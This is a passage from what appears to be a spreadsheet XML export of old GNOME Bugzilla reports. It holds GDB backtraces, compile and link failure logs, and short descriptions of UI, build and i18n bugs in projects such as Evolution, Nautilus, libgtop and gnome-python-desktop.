	e = (EThread *) 0x80f5660
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 98311
#5  0x409bec60 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 65541 (LWP 9261)):
#0  0x4154e768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x409c1198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x409bdd4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x4009e4f7 in e_msgport_wait (mp=0x80f3a78) at e-msgport.c:302
	_buffer = {__routine = 0x4009e25f  
  __arg = 0x80f3a78 __canceltype = -1088423372 __prev = 0x0}
	msg = (EMsg *) 0x81f5900
#4  0x4009ee0f in thread_dispatch (din=0x80f5a08) at e-msgport.c:665
	e = (EThread *) 0x80f5a08
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x81f5900
	self = 65541
#5  0x409bec60 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 9260)):
#0  0x4154e768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x409c1198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x409bdd4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x4009e4f7 in e_msgport_wait (mp=0x82509d0) at e-msgport.c:302
	_buffer = {__routine = 0x4009e25f  
  __arg = 0x82509d0 __canceltype = 134916372 __prev = 0x0}
	msg = (EMsg *) 0x0
#4  0x41776b3d in get_password (session=0x811a840 
    prompt=0x8250ad8 Please enter the IMAP password for verbal
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-152107</t>
  </si>
  <si>
    <t>gnect</t>
  </si>
  <si>
    <t>gnect iagno nibbles and robots needs sound love</t>
  </si>
  <si>
    <t>gnect includes a sound list but no file= arguments are supplied and indeed no
sample wav files are given.  I suggest that gnect simply not include a sound
list until sample sounds are provided otherwise they appear in the
gnome-sound-properties capplet but are empty.  I don't think we can expect most
users to record their own .wav files and set them up for this.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-55487</t>
  </si>
  <si>
    <t>en changeant mon fond d'ecran</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: major
Version: 1.4.0.1
Synopsis: en changeant mon fond d'ecran
Bugzilla-Product: control-center
Bugzilla-Component: general
Description:
quand j'ai changer mon fond d'ecran j'ai eu le message de l'erreur
Debugging Information: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0x406aa1d9 in wait4 () from /lib/libc.so.6
#0  0x406aa1d9 in wait4 () from /lib/libc.so.6
#1  0x40719f2c in __check_rhosts_file () from /lib/libc.so.6
#2  0x40166ce9 in gnome_init () from /usr/lib/libgnomeui.so.32
#3  0x4066fe94 in free () from /lib/libc.so.6
#4  0x405e07f9 in gdk_pixbuf_postinit () from /usr/lib/libgdk_pixbuf.so.2
#5  0x000107cc in ?? ()
#0  0x406aa1d9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40719f2c in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x40166ce9 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4066fe94 in free () from /lib/libc.so.6
No symbol table info available.
#4  0x405e07f9 in gdk_pixbuf_postinit () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
#5  0x000107cc in ?? ()
No symbol table info available.
#0  0x00000000 in ?? ()
No symbol table info available.
#0  0x00000000 in ?? ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-30 14:07 -------
The original reporter (yam@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>yam</t>
  </si>
  <si>
    <t>GTKHTML-240320</t>
  </si>
  <si>
    <t>copy+paste whole text part into composer creates table</t>
  </si>
  <si>
    <t>If you copy an entire text/plain part of a message in evolution and
paste it into the composer it pastes it inside a 1x1 table. This is
using Edit-&gt;Copy and Paste not select+middle button. (If you select
one character less than the entire part it copies and pastes normally.)
The table is actually there in the source html so it's not like it's
being totally random but it's still annoying and weird to anyone who
isn't familiar with the mail-display code. I feel like it should know
to ignore the table when cutting in this case...
But you can WONTFIX or NOTABUG this</t>
  </si>
  <si>
    <t>EVOLUTION-212149</t>
  </si>
  <si>
    <t>Importers</t>
  </si>
  <si>
    <t>looking for stuff to import window needs force-drawn magic</t>
  </si>
  <si>
    <t>The la la i'm looking for things to import now window in the
startup wizard needs to have the same magic applied to it as the
shutdown window did to ensure that it always draws its contents.</t>
  </si>
  <si>
    <t>GNOME-PANEL-365008</t>
  </si>
  <si>
    <t>[patch] minor fixes</t>
  </si>
  <si>
    <t>- There is a leak related to gconf_client_get_string ().
- The arguments for a g_warning are in the wrong order.
Attached patch fixes this.</t>
  </si>
  <si>
    <t>NAUTILUS-48469</t>
  </si>
  <si>
    <t>nautilus 1.0.4 not compiling with mozilla 0.9.3</t>
  </si>
  <si>
    <t xml:space="preserve">Nautilus 1.0.4 doesn't compile with mozilla 0.9.3. Maybe some defines/structs
changed?
...
c++ -DHAVE_CONFIG_H -I. -I. -I../.. -I../..    
-DGNOMELOCALEDIR=\/opt/gnome/share/locale\ 
-DG_LOG_DOMAIN=\Nautilus-Mozilla\     -DDATADIR=\/opt/gnome/share\ 
-DPREFIX=\/opt/gnome\                 -DMOZILLA_HAVE_PROFILES_SUPPORT
-I/opt/gnome/include/mozilla -I/opt/gnome/include/mozilla/nspr -fno-rtti
-fno-exceptions        -I/opt/gnome/include/gconf/1 -I/opt/gnome/include
-I/opt/gnome/include/glib-1.2 -I/opt/gnome/lib/glib/include
-I/opt/gnome/include/gtk-1.2 -I/usr/X11R6/include                
-I/opt/gnome/include -DNEED_GNOMESUPPORT_H -I/opt/gnome/lib/gnome-libs/include
-I/opt/gnome/include/gtk-1.2 -I/opt/gnome/include/glib-1.2
-I/opt/gnome/lib/glib/include -I/usr/X11R6/include
-I/opt/gnome/include/gnome-xml -I/opt/gnome/lib/vfs/include -D_REENTRANT
-I/opt/gnome/include/gconf/1          -O2 -c mozilla-events.cpp
mozilla-events.cpp: In instantiation of `nsCOMPtr':
mozilla-events.cpp:341:   instantiated from here
mozilla-events.cpp:341: `sizeof' applied to incomplete type `nsIContentViewer'
mozilla-events.cpp: In instantiation of `nsDerivedSafe':
mozilla-events.cpp:347:   instantiated from here
mozilla-events.cpp:347: base class `nsIContentViewer' has incomplete type
mozilla-events.cpp: In function `void navigate_to_node(GtkMozEmbed * nsIDOMNode
*)':
mozilla-events.cpp:347: cannot convert `contentViewer' from type
`nsCOMPtr' to type `nsISupports *'
make[3]: *** [mozilla-events.o] Error 1
make[3]: Leaving directory `/home/wouter/Chroot/nautilus-1.0.4/components/mozilla'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/wouter/Chroot/nautilus-1.0.4/components'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/wouter/Chroot/nautilus-1.0.4'
make: *** [all-recursive-am] Error 2
[cocaine:~/Chroot/nautilus-1.0.4] _
------- Additional Comments From wvhemel@vub.ac.be 2001-08-09 10:59:35 ----
Fixed in cvs-head (2001-08-07) with inclusion of a couple includes
(nsIContentView.h). Thanks Darin!
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
The original reporter (wvhemel@vub.ac.be) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>wvhemel</t>
  </si>
  <si>
    <t>LIBGTOP-440678</t>
  </si>
  <si>
    <t>LIBGTOP</t>
  </si>
  <si>
    <t>Location of G_GNUC_INTERNAL breaks Solaris build</t>
  </si>
  <si>
    <t>libgtop makes use of the G_GNUC_INTERNAL macro in include/glibtop/error.h and src/daemon/daemon.h.
For the Solaris forte compiler this must be placed at the start of the line.
Can you please apply the attached patch this makes the 19 changes for the 2
libgtop files.
This will not affect gcc - it does not care where the macro is placed.
See glib bug #438873 which has accepted a similar patch.</t>
  </si>
  <si>
    <t>libgtop-maint</t>
  </si>
  <si>
    <t>GTKHTML-240494</t>
  </si>
  <si>
    <t>rendering bug in evo-1.3 snapshots</t>
  </si>
  <si>
    <t>With the latest snapshots I'm seeing pretty nasty rendering problems on
the right hand side of the pane when one types a lot of smallish words
with the scroll bars expanded that the horiz one is not visible.
The screenshot shows the text croppage.
If you force a re-expose the rendering works just fine - making it very odd
indeed. Screenshot attached.</t>
  </si>
  <si>
    <t>EVOLUTION-250294</t>
  </si>
  <si>
    <t>Deleting a task doesn't clear task pane.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Deleting a task doesn't clear task pane when it's the only task in list
(This is something users complained a lot on mailer)
Steps to reproduce the problem:
1. Delete a task from task details window
2. 
3. 
Actual Results:
Task is deleted but remains in task pane
Expected Results:
Task pane is cleared
How often does this happen? 
Allways
Additional Information:</t>
  </si>
  <si>
    <t>NETWORKMANAGER-349993</t>
  </si>
  <si>
    <t>VPN: pptp</t>
  </si>
  <si>
    <t>Finish Creating VPN Connection dialog too tall</t>
  </si>
  <si>
    <t>As we discussed you want dialogs &lt; 768px the large number of options pushes the Finish Creating VPN Connection dialog to over 800px.  
Possible solutions assuming you just pass a set of text back to nm for display: only display things changed from default only pass non-expert options pass all in a non-double-spaces format?</t>
  </si>
  <si>
    <t>eemynotna</t>
  </si>
  <si>
    <t>craig</t>
  </si>
  <si>
    <t>GNOME-DESKTOP-302454</t>
  </si>
  <si>
    <t>libgnome-desktop</t>
  </si>
  <si>
    <t>GNOME-DESKTOP</t>
  </si>
  <si>
    <t>init i18n before using it</t>
  </si>
  <si>
    <t>Distribution/Version: Mandriva Linux cooker
I've found some i18n problem in gnome-desktop attached patch fixes them :
-gnome-desktop-item.c never initialize gettext correctly causing problem when
system locale is not UTF-8.
-gi18n.h is used instead of gi18n-lib.h causing translation to use the wrong domain
-textdomain is called in gnome-ditem-edit.c which is wrong for a library.
-compilation will fail if bind_textdomain_codeset isn't available on the system.
in the attached patch I didn't factorise bind* calls between
gnome-desktop-item.c and gnome-ditem-edit.c since the worst case scenario would
be two calls and it would add a static boolean in the library.
Permission to commit to CVS (HEAD and 2.10 branch) ?</t>
  </si>
  <si>
    <t>gnome-desktop-maint</t>
  </si>
  <si>
    <t>GAL-210337</t>
  </si>
  <si>
    <t>EText</t>
  </si>
  <si>
    <t>Can't use Korean characters in mail subject</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
 When writing a new message Korean characters in mail subject are not
accepted.
Steps to reproduce the problem:
1. Install Korean fonts.
2. Set LANG=ko_KR.euckr
3. Install Korean input method application like ami/ami-gnome.
4. Start Evolution and open new message window.
5. Try to write Korean characters in subject field.
Actual Results:
 Nothing's displayed when you type Korean characters.
Expected Results:
 Should accept Korean character input.
How often does this happen? 
 Everytime.
Additional Information:</t>
  </si>
  <si>
    <t>fender</t>
  </si>
  <si>
    <t>GNOME-UTILS-79960</t>
  </si>
  <si>
    <t>GDict Screenshots need updating</t>
  </si>
  <si>
    <t>I've just committed a change to gdict that removes the progress part of the
gnome-appbar [status bar]. It's not used so there really is no point in
having a silly non-useful entry to confuse the users].</t>
  </si>
  <si>
    <t>jfleck.gnome</t>
  </si>
  <si>
    <t>NAUTILUS-309683</t>
  </si>
  <si>
    <t>Browser view should ignore spatial settings</t>
  </si>
  <si>
    <t>The browser mode is not as powerful as it could be because it respects each
folders spatial view and background settings.  Browsing through folders with
different view settings and backgrounds makes it harder to find the file(s)
you're looking for.
Other information:
I believe that the usability of browser mode would be improved if each nautilus
browser window had its own view setting.</t>
  </si>
  <si>
    <t>GTK+-74439</t>
  </si>
  <si>
    <t>GtkDialog example references GTK_STOCK_BUTTON_CLOSE</t>
  </si>
  <si>
    <t>GTK_STOCK_BUTTON_CLOSE doesn't exist ... beeds to be GTK_STOCK_CLOSE.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-75238</t>
  </si>
  <si>
    <t>cdplayer</t>
  </si>
  <si>
    <t>Unable to select next/previous track from CD Player applet</t>
  </si>
  <si>
    <t>Gnome Beta 2 was built on a Solaris 8 (32 bit) sun sparc machine.
Description:
Unable to select next/previous track from CD Player applet.
Steps:
1. Create a CD Player applet.
2. Inseart some audio CD in to the CD Rom Drive
3. Select Play button.It starts playing
4. Press next track button it will not go to the next track.
5. Press Previous Track button it will not go to previous track</t>
  </si>
  <si>
    <t>jathish.maruthoormana</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-499770</t>
  </si>
  <si>
    <t>Bugs.gnome.org doesn't work anymore</t>
  </si>
  <si>
    <t>For over a month or so I haven't been able to access GNOME's bugzilla using http://bugs.gnome.org url.. I thought it was only because of the heavy load...
plaes@sol ~ $ host bugs.gnome.org
bugs.gnome.org has address 209.132.176.181
bugs.gnome.org mail is handled by 10 mail.gnome.org.
plaes@sol ~ $ host bugzilla.gnome.org
bugzilla.gnome.org has address 209.132.176.175
bugzilla.gnome.org mail is handled by 10 mail.gnome.org.</t>
  </si>
  <si>
    <t>RHYTHMBOX-320432</t>
  </si>
  <si>
    <t>wont build w/ -Werror on gentoo</t>
  </si>
  <si>
    <t>Distribution/Version: gentoo
Linux aleph 2.6.14-rc5-mm1 #1 SMP PREEMPT Mon Oct 31 11:12:52 PST 2005 i686
Intel(R) Pentium(R) 4 CPU 3.20GHz GenuineIntel GNU/Linux
http://pastebin.com/413644
      rb-podcast-source.c: In function 'rb_podcast_source_post_date_cell_data_func':
      rb-podcast-source.c:1638: warning: `%x' yields only last 2 digits of year
in some locales
      make[2]: *** [rb-podcast-source.lo] Error 1
      make[2]: Leaving directory `/home/adamb/src/rhythmbox/sources'
      make[1]: *** [all-recursive] Error 1
      make[1]: Leaving directory `/home/adamb/src/rhythmbox'
      make: *** [all] Error 2 
removed -Werror from sources/Makefile to build</t>
  </si>
  <si>
    <t>GNOME-CHESS-53848</t>
  </si>
  <si>
    <t>GNOME-CHESS</t>
  </si>
  <si>
    <t>Server board strings parsed wrong with -ve time</t>
  </si>
  <si>
    <t>The style 12 string from a chess server with a negative remaing time is
parsed wrong.</t>
  </si>
  <si>
    <t>EPIPHANY-128097</t>
  </si>
  <si>
    <t>Renaming topic doesn't update bookmarks menu</t>
  </si>
  <si>
    <t>Renaming topic doesn't update bookmarks menu:
To repro:
1. Go Bookmarks -&gt; Edit Bookmarks
2. Rename a topic and exit bookmarks editor
3. Click Bookmarks menu
Results:
Topic is still what it was before.</t>
  </si>
  <si>
    <t>GNOPERNICUS-171194</t>
  </si>
  <si>
    <t>performance</t>
  </si>
  <si>
    <t>a better debug module</t>
  </si>
  <si>
    <t>Now the debug support in gnopernicus is only for events received from at-spi. A
general and robust way is required.</t>
  </si>
  <si>
    <t>rd</t>
  </si>
  <si>
    <t>GEDIT-135000</t>
  </si>
  <si>
    <t>Save the changes to document before closing dialog should have Accessible Role ALERT</t>
  </si>
  <si>
    <t>korn</t>
  </si>
  <si>
    <t>EVOLUTION-519292</t>
  </si>
  <si>
    <t>Threading is always collapsed sort by date does not work anymore expand all fails</t>
  </si>
  <si>
    <t>Please describe the problem:
I used the 'Group by Threads' feature.
Up until 2.21.91 Threads were always expanded at startup. A new mail coming to an old thread would push that thread to the top of my Mail View. I sort by date descending so this is exactly what I want. It takes the newest date in the thread to sort by.
In 2.21.92 this changed:
1. On startup all threads are always collapsed. even if I do expand all the next start will collapse all threads again
2. Order by date does not work anymore. It always takes the first email in the thread to order. that makes threading much less useful! new emails for older threads are not on top which makes them easy to miss.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Either switch this back the old behavior or make it configurable somehow please.
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>mikopp</t>
  </si>
  <si>
    <t>GNOME-VFS-44221</t>
  </si>
  <si>
    <t>Pressing Cancel button in copy/transfer dialog does not cancel operation</t>
  </si>
  <si>
    <t xml:space="preserve">When the cancel button is pressed the underlying gnome-vfs module continues
copying. The context being passed into the module operation is NULL and cannot
be checked for cancellation or any other info for that matter.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:45 -------
The original owner (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component yakk@yakk.net.
</t>
  </si>
  <si>
    <t>yakk</t>
  </si>
  <si>
    <t>gzr</t>
  </si>
  <si>
    <t>EVOLUTION-229501</t>
  </si>
  <si>
    <t>does not conform to the RFC when exporting addresses</t>
  </si>
  <si>
    <t>Description of Problem:
when exporting an address/address book:
1. missing mandatory type VERSION
2. lines are not always split
3. lines are not split at the right position
2. lines are not split correctly
Steps to reproduce the problem:
1. export any address
2. specify a long address (100 characters for example)
3. specify a long address (100 characters for example)
4. specify a long address (100 characters for example)
Actual Results:
1. VERSION not present in a vcard address
2. a very long ADR would not be split (while LABEL
would be split for example)
3. value is split at 75th character instead of 75
character of content-line
4. line is split by inserting = CRLF
Expected Results:
1. VERSION=3.0
2. ADR should be split
3. LABEL should be split at 75th character of
content-line not 75th character of value
4. lines should be split by inserting CRLF WSP or
CRLF TAB
How often does this happen? 
always
Additional Information:
see RFC 2426 2425</t>
  </si>
  <si>
    <t>ydu</t>
  </si>
  <si>
    <t>GSTREAMER-561789</t>
  </si>
  <si>
    <t>[volume] deadlocks with a controller attached</t>
  </si>
  <si>
    <t>Since this change: http://webcvs.freedesktop.org/gstreamer/gst-plugins-base/gst/volume/gstvolume.c?r1=1.101&amp;r2=1.102
attaching a controller to a volume element has resulted in a streaming thread deadlocking.</t>
  </si>
  <si>
    <t>EVINCE-349292</t>
  </si>
  <si>
    <t>uses deprecated AM init macro</t>
  </si>
  <si>
    <t>Evince uses the deprecated form of the AM_INIT_AUTOMAKE macro.</t>
  </si>
  <si>
    <t>GLADE-394382</t>
  </si>
  <si>
    <t>Adding a child widget to a notebook resets the current notebook page</t>
  </si>
  <si>
    <t>Please describe the problem:
Adding a new widget to a previously empty notebook tab resets the notebook so that it then displays the first tab rather than the tab that was previously selected. It's a bit confusing UI-wise.
Steps to reproduce:
1. create a new notebook widget with more than one tab
2. add a new widget to the 2nd tab
Actual results:
the notbook resets to displaying the 1st tab
Expected results:
the notebook should continue to display the tab that was previously selected
Does this happen every time?
yes
Other information:
In #glade3 tristan says:
yes the notebook needs to be completely reconstructed every time a position changes or a widget added</t>
  </si>
  <si>
    <t>duncan-gnomebugs</t>
  </si>
  <si>
    <t>GSTREAMER-453636</t>
  </si>
  <si>
    <t>dvbsrc needs more flexible adapter selection</t>
  </si>
  <si>
    <t>There are some devices that are exposed as one adapter but with multiple frontend demux and dvr device nodes.
e.g. Dreambox 7025 has inside /dev/dvb/adapter0:
frontend0
demux0
dvr0
frontend1
demux1
dvr1
Just allowing /dev/dvb/adapter0 to be passed as the device parameter does not suffice.</t>
  </si>
  <si>
    <t>zaheermerali</t>
  </si>
  <si>
    <t>EOG-166849</t>
  </si>
  <si>
    <t>libgnome/gnome-i18n.h is deprecated</t>
  </si>
  <si>
    <t>Please describe the problem:
replace all:
#include 
by:
#include 
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GLIB-551228</t>
  </si>
  <si>
    <t>G_STRFUNC on recent Sun compiler should be expanded to __func__ rather than '???'</t>
  </si>
  <si>
    <t>Please describe the problem:
For each glib based application G_STRFUNC shows as '???' is not useful for debugging. 
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>lin.ma</t>
  </si>
  <si>
    <t>XMLSEC-102196</t>
  </si>
  <si>
    <t>XMLSEC</t>
  </si>
  <si>
    <t>-Wall and -ansi not valid CC option for Sun compliers</t>
  </si>
  <si>
    <t>[version 0.0.11 - not in gnome bugzilla options]
Not being a configure expect I can not provide a suggested patch.
I had to had edit out '-Wall' and '-ansi' from several of the Makefiles
produced by the configure command.
The Sun Compiler does not have a '-Wall' or '-ansi' flag.</t>
  </si>
  <si>
    <t>aleksey</t>
  </si>
  <si>
    <t>Doug</t>
  </si>
  <si>
    <t>EPIPHANY-516138</t>
  </si>
  <si>
    <t>Use G_DEFINE_TYPE* macros in src/bookmarks/ when possible.</t>
  </si>
  <si>
    <t>ssia.</t>
  </si>
  <si>
    <t>xan</t>
  </si>
  <si>
    <t>GNOME-PYTHON-DESKTOP-506401</t>
  </si>
  <si>
    <t>evolution</t>
  </si>
  <si>
    <t>GNOME-PYTHON-DESKTOP</t>
  </si>
  <si>
    <t>evolution *.override files need NO_IMPORT_PYGOBJECT defined to avoid multiply defined symbols at link time</t>
  </si>
  <si>
    <t>/usr/bin/glibtool --tag=CC   --mode=link gcc -DORBIT2=1 -D_REENTRANT -I/usr/include/libxml2 -I/opt/local/include/evolution-data-server-1.10 -I/opt/local/include/libbonobo-2.0 -I/opt/local/include/libgnome-2.0 -I/opt/local/include/glib-2.0 -I/opt/local/lib/glib-2.0/include -I/opt/local/include/orbit-2.0 -I/opt/local/include/bonobo-activation-2.0 -I/opt/local/include/gconf/2 -I/opt/local/include/gnome-vfs-2.0 -I/opt/local/lib/gnome-vfs-2.0/include -I/opt/local/include -I/opt/local/include/pygtk-2.0 -I/opt/local/include/gtk-2.0 -I/opt/local/include/pango-1.0   -arch ppc  -g -Wall   -pipe -no-cpp-precomp -Dsocklen_t=int -DMAC_OS_X_VERSION_MAX_ALLOWED=MAC_OS_X_VERSION_10_3   -module -avoid-version -export-symbols-regex initebook -arch ppc     -L/opt/local/lib           -o ebook.la -rpath /opt/local/lib/python2.5/site-packages/gtk-2.0/evolution ebook_la-ebookmodule.lo ebook_la-override_common.lo ebook_la-evo-ebook-environment.lo ebook_la-evo-contact.lo ebook_la-evo-addressbook.lo ebook_la-ebook-enums.lo ebook_la-ebook.lo -L/opt/local/lib -lebook-1.2 -lgnome-2 -lpopt -ledataserver-1.2 -lxml2 -lgconf-2 -lbonobo-2 -lbonobo-activation -lORBit-2 -lgthread-2.0 -lgdk_pixbuf-2.0 -lpango-1.0 -lgobject-2.0 -lgmodule-2.0 -lglib-2.0 -lintl -liconv   
rm -fr  .libs/ebook.a .libs/ebook.exp .libs/ebook.la .libs/ebook.lai .libs/ebook.so
generating symbol list for `ebook.la'
/usr/bin/nm -p  .libs/ebook_la-ebookmodule.o .libs/ebook_la-override_common.o .libs/ebook_la-evo-ebook-environment.o .libs/ebook_la-evo-contact.o .libs/ebook_la-evo-addressbook.o .libs/ebook_la-ebook-enums.o .libs/ebook_la-ebook.o  | sed -n -e 's/^.*[     ]\([BCDEGRST][BCDEGRST]*\)[     ][      ]*_\([_A-Za-z][_A-Za-z0-9]*\)$/\1 _\2 \2/p' | /usr/bin/sed 's/.* //' | sort | uniq &gt; .libs/ebook.exp
/usr/bin/grep -E -e initebook .libs/ebook.exp &gt; .libs/ebook.expT
mv -f .libs/ebook.expT .libs/ebook.exp
sed -e s#.* -e s^[ ]* -e s^\(..*\)_&amp;  .libs/ebook-symbols.expsym
gcc ${wl}-undefined ${wl}dynamic_lookup -o .libs/ebook.so -bundle  .libs/ebook_la-ebookmodule.o .libs/ebook_la-override_common.o .libs/ebook_la-evo-ebook-environment.o .libs/ebook_la-evo-contact.o .libs/ebook_la-evo-addressbook.o .libs/ebook_la-ebook-enums.o .libs/ebook_la-ebook.o  -L/opt/local/lib /opt/local/lib/libebook-1.2.9.0.1.dylib /opt/local/lib/libesd.0.2.38.dylib /opt/local/lib/libaudiofile.0.0.2.dylib /opt/local/lib/libcamel-1.2.10.0.0.dylib -L/opt/local/lib/firefox-3.0a1 /opt/local/lib/libgnomevfs-2.0.2000.1.dylib /opt/local/lib/libdbus-glib-1.2.1.0.dylib /usr/lib/libdbus-1.3.4.0.dylib /usr/lib/libssl.dylib /usr/lib/libcrypto.dylib /usr/lib/libz.dylib /usr/lib/libm.dylib /opt/local/lib/libORBitCosNaming-2.0.1.0.dylib /usr/lib/libc.dylib /usr/lib/libpthread.dylib /opt/local/lib/libgnome-2.0.2103.1.dylib /usr/lib/libpopt.dylib /opt/local/lib/libedataserver-1.2.9.0.0.dylib /usr/lib/libxml2.2.6.30.dylib /opt/local/lib/libgconf-2.4.1.2.dylib /opt/local/lib/libbonobo-2.0.0.0.dylib /opt/local/lib/libbonobo-activation.4.0.0.dylib /opt/local/lib/libORBit-2.0.1.0.dylib /opt/local/lib/libgthread-2.0.0.1501.0.dylib /opt/local/lib/libgdk_pixbuf-2.0.0.1500.0.dylib /opt/local/lib/libpango-1.0.0.1900.2.dylib /opt/local/lib/libgobject-2.0.0.1501.0.dylib /opt/local/lib/libgmodule-2.0.0.1501.0.dylib /opt/local/lib/libglib-2.0.0.1501.0.dylib /opt/local/lib/libintl.8.0.2.dylib /usr/lib/libiconv.2.4.0.dylib -arch ppc -arch ppc
ld: multiple definitions of symbol __PyGObject_API
.libs/ebook_la-ebookmodule.o definition of __PyGObject_API in section (__DATA__common)
.libs/ebook_la-ebook.o definition of __PyGObject_API in section (__DATA__common)
ld: warning multiple definitions of symbol _locale_charset
/usr/lib/libiconv.2.4.0.dylib(localcharset.o) definition of _locale_charset
/opt/local/lib/libintl.8.0.2.dylib(localcharset.o) definition of _locale_charset
make[3]: *** [ebook.la] Error 1
and 
/usr/bin/glibtool --tag=CC   --mode=link gcc -DORBIT2=1 -D_REENTRANT -I/usr/include/libxml2 -I/opt/local/include/evolution-data-server-1.10 -I/opt/local/include/libgnome-2.0 -I/opt/local/include/libbonobo-2.0 -I/opt/local/include/orbit-2.0 -I/opt/local/include/gconf/2 -I/opt/local/include/gnome-vfs-2.0 -I/opt/local/lib/gnome-vfs-2.0/include -I/opt/local/include -I/opt/local/include/glib-2.0 -I/opt/local/lib/glib-2.0/include -I/opt/local/include/bonobo-activation-2.0 -I/opt/local/include/pygtk-2.0 -I/opt/local/include/gtk-2.0 -I/opt/local/include/pango-1.0   -arch ppc  -g -Wall   -pipe -no-cpp-precomp -Dsocklen_t=int -DMAC_OS_X_VERSION_MAX_ALLOWED=MAC_OS_X_VERSION_10_3   -module -avoid-version -export-symbols-regex initecal -arch ppc     -L/opt/local/lib           -o ecal.la -rpath /opt/local/lib/python2.5/site-packages/gtk-2.0/evolution ecal_la-ecalmodule.lo ecal_la-override_common.lo ecal_la-evo-ecal-environment.lo ecal_la-evo-calendar.lo ecal_la-ecal.lo -L/opt/local/lib -lecal-1.2 -lgnome-2 -lpopt -ledataserver-1.2 -lxml2 -lgconf-2 -lbonobo-2 -lbonobo-activation -lORBit-2 -lgthread-2.0 -lgdk_pixbuf-2.0 -lpango-1.0 -lgobject-2.0 -lgmodule-2.0 -lglib-2.0 -lintl -liconv   
rm -fr  .libs/ecal.a .libs/ecal.exp .libs/ecal.la .libs/ecal.lai .libs/ecal.so
generating symbol list for `ecal.la'
/usr/bin/nm -p  .libs/ecal_la-ecalmodule.o .libs/ecal_la-override_common.o .libs/ecal_la-evo-ecal-environment.o .libs/ecal_la-evo-calendar.o .libs/ecal_la-ecal.o  | sed -n -e 's/^.*[  ]\([BCDEGRST][BCDEGRST]*\)[     ][      ]*_\([_A-Za-z][_A-Za-z0-9]*\)$/\1 _\2 \2/p' | /usr/bin/sed 's/.* //' | sort | uniq &gt; .libs/ecal.exp
/usr/bin/grep -E -e initecal .libs/ecal.exp &gt; .libs/ecal.expT
mv -f .libs/ecal.expT .libs/ecal.exp
sed -e s#.* -e s^[ ]* -e s^\(..*\)_&amp;  .libs/ecal-symbols.expsym
gcc ${wl}-undefined ${wl}dynamic_lookup -o .libs/ecal.so -bundle  .libs/ecal_la-ecalmodule.o .libs/ecal_la-override_common.o .libs/ecal_la-evo-ecal-environment.o .libs/ecal_la-evo-calendar.o .libs/ecal_la-ecal.o  -L/opt/local/lib /opt/local/lib/libecal-1.2.7.0.1.dylib /opt/local/lib/libesd.0.2.38.dylib /opt/local/lib/libaudiofile.0.0.2.dylib /opt/local/lib/libgnomevfs-2.0.2000.1.dylib /opt/local/lib/libdbus-glib-1.2.1.0.dylib /usr/lib/libdbus-1.3.4.0.dylib /usr/lib/libssl.dylib /usr/lib/libcrypto.dylib -L/opt/local/lib/firefox-3.0a1 /usr/lib/libz.dylib /usr/lib/libm.dylib /opt/local/lib/libORBitCosNaming-2.0.1.0.dylib /usr/lib/libc.dylib /usr/lib/libpthread.dylib /opt/local/lib/libgnome-2.0.2103.1.dylib /usr/lib/libpopt.dylib /opt/local/lib/libedataserver-1.2.9.0.0.dylib /usr/lib/libxml2.2.6.30.dylib /opt/local/lib/libgconf-2.4.1.2.dylib /opt/local/lib/libbonobo-2.0.0.0.dylib /opt/local/lib/libbonobo-activation.4.0.0.dylib /opt/local/lib/libORBit-2.0.1.0.dylib /opt/local/lib/libgthread-2.0.0.1501.0.dylib /opt/local/lib/libgdk_pixbuf-2.0.0.1500.0.dylib /opt/local/lib/libpango-1.0.0.1900.2.dylib /opt/local/lib/libgobject-2.0.0.1501.0.dylib /opt/local/lib/libgmodule-2.0.0.1501.0.dylib /opt/local/lib/libglib-2.0.0.1501.0.dylib /opt/local/lib/libintl.8.0.2.dylib /usr/lib/libiconv.2.4.0.dylib -arch ppc -arch ppc
ld: multiple definitions of symbol __PyGObject_API
.libs/ecal_la-ecalmodule.o definition of __PyGObject_API in section (__DATA__common)
.libs/ecal_la-ecal.o definition of __PyGObject_API in section (__DATA__common)
ld: warning multiple definitions of symbol _locale_charset
